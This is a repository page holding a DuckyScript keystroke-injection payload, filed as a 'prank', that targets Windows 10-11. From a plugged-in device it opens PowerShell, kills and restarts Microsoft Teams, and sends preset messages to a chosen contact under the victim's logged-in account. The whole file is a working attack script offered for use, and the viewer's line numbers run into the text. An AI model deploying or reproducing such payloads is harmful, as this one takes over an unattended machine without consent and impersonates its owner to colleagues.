Path: blob/master/payloads/library/prank/SendMessagesInTeams/payload.txt
2968 views
REM ###########################################1REM # |2REM # Title : Send Messages In Teams |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Prank |6REM # Target : Windows 10-11 |7REM # |8REM ###########################################910REM Requirements:11REM - Microsoft Teams installed and user logged-in12REM - Internet Connection13REM - ExecutionPolicy Bypass14REM - Python1516REM 1. Open a powershell17REM 2. Close if Teams is opens and reopen it18REM 3. Goto search bar19REM 4. Search the person by name, email, id or what you want...20REM 5. Downarrow and enter to open the chat2122REM REQUIRED - Name, email, id or what you want for contact the target23DEFINE USER-ID example24REM REQUIRED - Messages25DEFINE MESSAGE1 example26REM ...27REM DEFINE MESSAGEN example..2829DELAY 100030GUI r31DELAY 100032STRING powershell33ENTER34DELAY 20003536REM #### Powershell ####37STRINGLN Stop-Process -Name "Teams"38DELAY 100039STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"40REM It depends by the computer power41DELAY 100004243REM #### Teams ####44CTRL N45DELAY 200046STRING USER-ID47ENTER48DELAY 200049TAB50DELAY 100051TAB52DELAY 10005354REM #### Messages ####55STRING MESSAGE156ENTER57DELAY 100058REM ...59REM STRINGLN MESSAGEN6061DELAY 50062ALT F463DELAY 50064ALT F4656667